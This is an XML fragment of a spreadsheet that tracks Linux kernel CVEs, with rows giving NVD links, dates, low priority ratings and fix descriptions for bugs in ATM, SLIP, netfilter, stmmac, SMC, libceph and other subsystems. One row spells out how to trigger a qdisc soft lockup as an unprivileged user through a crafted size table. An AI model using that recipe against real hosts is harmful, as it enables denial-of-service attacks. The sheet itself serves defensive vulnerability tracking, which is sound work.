      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr"/>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: atm: usbatm: fix invalid ci_range initialization
syzbot reported a shift-out-of-bounds in __vcc_connect():
  UBSAN: shift-out-of-bounds in net/atm/common.c:382:32
  shift exponent -1 is negative
  CPU: 0 UID: 0 PID: 5987 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full)
  Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 08/05/2026
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
   ubsan_epilogue+0xa/0x30 lib/ubsan.c:233
   __ubsan_handle_shift_out_of_bounds+0x36d/0x400 lib/ubsan.c:494
   __vcc_connect+0x14b4/0x19c0 net/atm/common.c:382
   vcc_connect+0x328/0x8f0 net/atm/common.c:498
   pvc_bind+0x272/0x380 net/atm/pvc.c:52
   __sys_bind+0x2e3/0x410 net/socket.c:1976
   __x64_sys_bind+0x7a/0x90 net/socket.c:1979
   ...
ATM device ci_range fields (vpi_bits and vci_bits) represent the
number of bits supported for VPI and VCI addressing on the device.
net/atm/common.c directly uses these fields as bit shift counts:
  vpi &gt;&gt; dev-&gt;ci_range.vpi_bits
  vci &gt;&gt; dev-&gt;ci_range.vci_bits
  1 &lt;&lt; vcc-&gt;dev-&gt;ci_range.vpi_bits
  1 &lt;&lt; vcc-&gt;dev-&gt;ci_range.vci_bits
usbatm_atm_init() sets ci_range.vpi_bits and ci_range.vci_bits to
ATM_CI_MAX (-1), which is defined in &lt;uapi/linux/atmdev.h&gt; as a
sentinel value for userspace ATM_SETCIRANGE requests, not a valid bit
count. Shifting by -1 is undefined behavior and triggers UBSAN
warnings.
ATM UNI cell headers allow up to 8 bits for VPI (0..255) and 16 bits
for VCI (0..65535). Initialize vpi_bits to 8 and vci_bits to 16, as
done by solos-pci.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90055</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90056</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2026-09-17</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr"/>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: fec: only stop PTP if it was initialized
fec_ptp_init() is only called when fep-&gt;bufdesc_ex is available.
However, fec_probe() unconditionally calls fec_ptp_stop() on the
failed_init path, and fec_drv_remove() unconditionally calls
fec_ptp_stop() during device removal.
Check fep-&gt;bufdesc_ex before calling fec_ptp_stop() in both paths
to avoid stopping PTP when it was not initialized.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90056</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90057</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2026-09-17</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr"/>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
slip: remove slip_hangup() to fix use-after-free in slip_receive_buf()
Jaeyoung Chung and Eulgyu Kim reported a slab-use-after-free read
in slip_receive_buf() when racing against tty hangup.
tty_ldisc_hangup() calls ld-&gt;ops-&gt;hangup() while holding only
a read lock on tty-&gt;ldisc_sem (via tty_ldisc_ref()).
Because slip_hangup() simply called slip_close(), it ran concurrently
with reader functions such as slip_receive_buf().
slip_close() unregisters and frees the net device and its private
struct slip, causing concurrent reader threads in slip_receive_buf()
to dereference freed memory.
Line discipline close() is already guaranteed to be called under
the write lock of tty-&gt;ldisc_sem during hangup processing
(in tty_ldisc_reinit() or tty_ldisc_kill()).
Remove slip_hangup() so teardown is serialized cleanly by slip_close().</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90057</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90058</t>
        </is>
      </c>
      <c r="D426" s="5" t="inlineStr"/>
      <c r="E426" s="5" t="inlineStr"/>
      <c r="F426" s="5" t="inlineStr"/>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr"/>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: bound qdisc_pkt_len to prevent qdisc soft lockup
qdisc_get_stab() accepts a user-supplied size table, and
__qdisc_calculate_pkt_len() amplifies qdisc_pkt_len() through the
overhead, the size-table data (u16), and size_log (up to
STAB_SIZE_LOG_MAX). A crafted stab can therefore set qdisc_pkt_len()
to ~1 GiB for an ordinary skb. Per-flow deficit schedulers such as
DRR and ETS replenish one quantum per loop iteration; with a tiny
quantum (1) they spin billions of times under the qdisc lock,
producing a soft lockup / RCU stall as illustrated by vega@nebusec.ai.
Cap the final qdisc_pkt_len() to QDISC_PKT_LEN_MAX so the size-table
amplification cannot drive deficit schedulers into an unbounded loop.
A legitimate size table (e.g. qfq's overhead 999999999, which is
handled by dropping) is still accepted.
Introduce cap QDISC_PKT_LEN_MAX (1 &lt;&lt; 20) = 1 MiB which is well above
any legitimate single-skb wire length: the largest current skb-&gt;len
is GSO_MAX_SIZE (524280), and an ATM-style size table (53/48 cell tax)
amplifies that to ~578 KB, both comfortably below 1 MiB. At the same
time, 1 MiB bounds the deficit refill loop to ~1M iterations per
packet with quantum=1, which completes in a few milliseconds well
under the demonstrated softlockup threshold (~10^9 iterations).
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_NET_SCH_DRR=y (or CONFIG_NET_SCH_ETS=y).
- Attach a DRR (or ETS) root qdisc with a crafted TCA_STAB that
  amplifies qdisc_pkt_len to ~1 GiB (e.g. size_log=15, data=[32768]).
- Add a class with a tiny quantum of 1 and send one small packet; the
  deficit loop spins billions of times under the qdisc lock and trips
  the softlockup detector (panic with kernel.softlockup_panic=1).
- Reachable as root or from an unprivileged user in a fresh user+net
  namespace (unshare -Urn) with namespace-local CAP_NET_ADMIN.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90058</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90059</t>
        </is>
      </c>
      <c r="D427" s="5" t="inlineStr"/>
      <c r="E427" s="5" t="inlineStr"/>
      <c r="F427" s="5" t="inlineStr"/>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr"/>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: restore NET_IP_ALIGN in the RX DMA offset
Since the RX path was converted to zero-copy, the page pool page is handed
to the stack directly as the skb head, and the offset the DMA engine writes
at is what determines the alignment of the packet headers.
Before the conversion the payload was copied into an skb obtained from
napi_alloc_skb(), which reserves NET_SKB_PAD + NET_IP_ALIGN. The
conversion moved the headroom into stmmac_rx_offset() but did not carry
over NET_IP_ALIGN, so on architectures where NET_IP_ALIGN is 2 the IP
header now lands misaligned:
  64 (NET_SKB_PAD) + 14 (ethernet) + 20 (IP) = 98
Same for the XDP branch:
  256 (XDP_PACKET_HEADROOM) + 14 (ethernet) + 20 (IP) = 290
On ARM32 this is fatal, because ldm and ldrd trap on unaligned addresses
even when CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS is set.
Any received echo request panics the machine, e.g:
  Unhandled fault: alignment exception (0x001) at 0x81873062
  Internal error: : 1 [#1] SMP ARM
  Hardware name: Altera SOCFPGA Arria10
  PC is at icmp_echo+0x38/0xa8
  LR is at icmp_rcv+0x22c/0x370
  Call trace:
   icmp_echo from icmp_rcv+0x22c/0x370
   icmp_rcv from ip_protocol_deliver_rcu+0x2c/0x224
   ip_protocol_deliver_rcu from ip_local_deliver+0xc8/0x1a0
   ip_local_deliver from ip_sublist_rcv_finish+0x3c/0x50
   ip_sublist_rcv_finish from ip_list_rcv_finish+0x110/0x118
   ip_list_rcv_finish from ip_list_rcv+0xc8/0xdc
   ip_list_rcv from __netif_receive_skb_list_core+0x170/0x1c0
   ...
   napi_complete_done from stmmac_napi_poll_rx+0xcb0/0x1030
  Code: e24dd068 e59020a0 e28dc010 e0822001 (e8920003)
  Kernel panic - not syncing: Fatal exception in interrupt
The faulting instruction is the ldm of *icmp_hdr(skb) in icmp_echo().
Fix by adding NET_IP_ALIGN back to the RX offset, which restores the
alignment the stack used to get.
Note that commit a955318fe67e ("stmmac: align RX buffers") made a similar
change in 2021 and was reverted by commit 12d125b4574b ("stmmac: Revert
"stmmac: align RX buffers"") because it caused packet corruption. That
patch raised the offset from 0 without adjusting the buffer size
accounting, so the DMA engine could arguably write past the end of the RX
buffers, though this was never root caused.
Commit df542f669307 ("net: stmmac: Switch to zero-copy in non-XDP RX
path") since derives the page pool allocation from stmmac_rx_offset(), so
the extra bytes are accounted for.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90059</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90060</t>
        </is>
      </c>
      <c r="D428" s="5" t="inlineStr"/>
      <c r="E428" s="5" t="inlineStr"/>
      <c r="F428" s="5" t="inlineStr"/>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr"/>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: control: Don't add invalid kcontrols to LED layer
The kcontrol LED state layer tries to track the all associated
kcontrol elements with naive assumptions that they are readable.
But one can create a write-only element that has no get callback (even
a user element can do it), and this may lead to a NULL dereference at
the call chain of snd_ctl_led_notify(), as found by syzkaller.
For avoiding the Oops, add a sanity check of the kcontrol's info and
get callbacks, and just skip the invalid kcontrols before assigning
the kctl to the LED layer.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90060</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90061</t>
        </is>
      </c>
      <c r="D429" s="5" t="inlineStr"/>
      <c r="E429" s="5" t="inlineStr"/>
      <c r="F429" s="5" t="inlineStr"/>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr"/>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: skip double clone set expressions on element insert
Both the dynset and newsetelem path clone the existing set expressions
when setting set element expressions if no override expressions are
provided. This results in a double clone, once to clone the template set
expressions then another clone on the new element. Add a flag to
annotate if userspace provides a override expression (ie. expression of
the same type of the set but different configuration), otherwise borrow
the existing expression from the set. Add conditionals to release
expression iif they represent an override. Use this new override_exprs
flag to dump the dynset expression override to userspace.
This simplifies the existing logic and it also fixes a bug with the
connlimit expression which results in a module refcount imbalance
WARNING splat when resorting on the default set expressions.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90061</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90062</t>
        </is>
      </c>
      <c r="D430" s="5" t="inlineStr"/>
      <c r="E430" s="5" t="inlineStr"/>
      <c r="F430" s="5" t="inlineStr"/>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr"/>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: move hardware offload step after building the chain blob
Allocate the chain blob before the ruleset offload to reduce chances of
entering an inconsistent state where the offloaded ruleset in the nic
and the software ruleset differ.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90062</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90063</t>
        </is>
      </c>
      <c r="D431" s="5" t="inlineStr"/>
      <c r="E431" s="5" t="inlineStr"/>
      <c r="F431" s="5" t="inlineStr"/>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr"/>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio-net: Ensure that TCP packets don't overflow gso_segs
The user can specify any gso_size in a packet crafted with an AF_PACKET
PACKET_VNET_HDR socket, even smaller than TCP_MIN_GSO_SIZE = 8. At the
same time, GSO_MAX_SIZE = 8 * GSO_MAX_SEGS = 8 * 65535. When the user
crafts a packet with gso_size &lt; 8, there is a risk for partial GSO to
overflow the 16-bit gso_segs field when dividing the SKB length by
gso_size.
Adjust gso_size of TCP packets to be at least TCP_MIN_GSO_SIZE = 8. Keep
gso_size of UDP GSO packets, as gso_size=1 is valid and explicitly
tested at tools/testing/selftests/net/tun.c:649.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90063</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90064</t>
        </is>
      </c>
      <c r="D432" s="5" t="inlineStr"/>
      <c r="E432" s="5" t="inlineStr"/>
      <c r="F432" s="5" t="inlineStr"/>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr"/>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Reject page faults from non-fault-mode scratch VMs
Having scratch enabled does not make a VM capable of handling recoverable
page faults. Allowing scratch VMs through the ASID lookup also admits
dma-fence mode VMs.
If such a VM faults on an already valid VMA, the handler reports success
without fixing the fault, causing the GPU to retry indefinitely.
Only allow fault-mode VMs through the ASID lookup. Fault-mode VMs using
scratch remain supported, while faults from 3D VMs are rejected.
(cherry picked from commit bfb24a06405b652d37831f3fb66b71d33a6605de)</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90064</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90065</t>
        </is>
      </c>
      <c r="D433" s="5" t="inlineStr"/>
      <c r="E433" s="5" t="inlineStr"/>
      <c r="F433" s="5" t="inlineStr"/>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr"/>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: release the internal TCP sock on IPPROTO_SMC socket creation failure
IPPROTO_SMC sockets create an internal TCP sock ("clcsock") from the
proto-&gt;init hook. When socket creation fails after proto-&gt;init has
run - e.g. a cgroup BPF program attached to BPF_CGROUP_INET_SOCK_CREATE
denies the socket - sk_common_release() only invokes sk_prot-&gt;destroy
if it is set, but neither smc_inet_prot nor smc_inet6_prot defines it,
and smc_destruct() returns early unless sk_state is SMC_CLOSED. As a
result, every failing socket(AF_INET, SOCK_STREAM, IPPROTO_SMC) call
leaks one tcp_sock, so an unprivileged task able to attach a deny-all
BPF_CGROUP_INET_SOCK_CREATE program to its own cgroup can grow kernel
memory unboundedly.
Add a .destroy hook to both protos that releases the clcsock via
smc_clcsock_release(). smc_sk_init() hashes the sock into the smc
hashinfo before the clcsock is created, and smc_diag dumps walk that
hash dereferencing smc-&gt;clcsock without taking clcsock_release_lock,
while sk_common_release() calls .destroy before .unhash. Unhash the
sock before releasing the clcsock, as __smc_release() does, so a
concurrent dump cannot observe the release; the second unhash in
sk_common_release() is a no-op.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90065</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90066</t>
        </is>
      </c>
      <c r="D434" s="5" t="inlineStr"/>
      <c r="E434" s="5" t="inlineStr"/>
      <c r="F434" s="5" t="inlineStr"/>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr"/>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
samples/ftrace: Fix kthread_stop() on ERR_PTR in ftrace-direct-multi-modify
ftrace_direct_multi_init() assigns kthread_run()'s return value to
simple_tsk without an IS_ERR() check. When kthread_run() fails it
returns ERR_PTR(-ENOMEM), but init still returns 0, so the module loads
with simple_tsk holding an error pointer. On unload,
ftrace_direct_multi_exit() then passes that ERR_PTR to kthread_stop(),
leading to a null-pointer-dereference.
Check the return value of kthread_run() with IS_ERR(); on failure,
unregister the ftrace direct call and propagate the error code.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90066</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90067</t>
        </is>
      </c>
      <c r="D435" s="5" t="inlineStr"/>
      <c r="E435" s="5" t="inlineStr"/>
      <c r="F435" s="5" t="inlineStr"/>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr"/>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libceph: validate banner payload length
When parsing the Ceph messenger v2 protocol banner, the `payload_len` field
is decoded from the banner prefix. If a client sends a banner with a
`payload_len` of 0, the kernel sets up a 0-length socket read. This
violates an invariant in the state machine, triggering a warning in
`populate_in_iter()`:
------------[ cut here ]------------
!iov_iter_count(&amp;con-&gt;v2.in_iter)
WARNING: net/ceph/messenger_v2.c:3129 at populate_in_iter
net/ceph/messenger_v2.c:3129 [inline], CPU#1: kworker/1:3/5070
WARNING: net/ceph/messenger_v2.c:3129 at ceph_con_v2_try_read+0x6634/0x6810
net/ceph/messenger_v2.c:3159, CPU#1: kworker/1:3/5070
...
Call Trace:
 &lt;TASK&gt;
 ceph_con_workfn+0x1f5/0x14a0 net/ceph/messenger.c:1575
 process_one_work kernel/workqueue.c:3322 [inline]
 process_scheduled_works+0xa8e/0x14e0 kernel/workqueue.c:3405
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3486
 kthread+0x388/0x470 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;
According to the msgr2 protocol specification, the banner payload is
expected to contain at least two 64-bit integers (`server_feat` and
`server_req_feat`). Therefore, `payload_len` must be at least 16 bytes.
Fix this by adding a check in `process_banner_prefix()` to reject a
`payload_len` smaller than 16 bytes. This prevents the 0-length read and
correctly aborts the connection with a protocol error.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90067</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90068</t>
        </is>
      </c>
      <c r="D436" s="5" t="inlineStr"/>
      <c r="E436" s="5" t="inlineStr"/>
      <c r="F436" s="5" t="inlineStr"/>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
